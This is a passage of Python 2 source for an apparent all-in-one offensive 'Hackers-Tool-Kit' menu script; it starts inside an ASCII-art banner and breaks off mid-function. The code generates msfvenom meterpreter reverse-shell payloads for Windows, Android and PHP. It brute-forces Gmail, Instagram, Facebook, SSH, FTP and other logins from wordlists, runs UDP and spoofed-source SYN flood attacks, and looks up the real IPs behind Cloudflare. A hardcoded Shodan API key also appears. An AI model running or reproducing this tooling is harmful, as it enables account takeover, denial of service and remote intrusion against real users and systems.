- ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[9msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=443 -o /root/phphack.php1m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,7) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -about : about the creator / me -? : displays this message -clear : clears screen except for banner -clearall: clears everything on screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file ] -phpload : make a php reverse_tcp payload and start it in a multi handler -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, 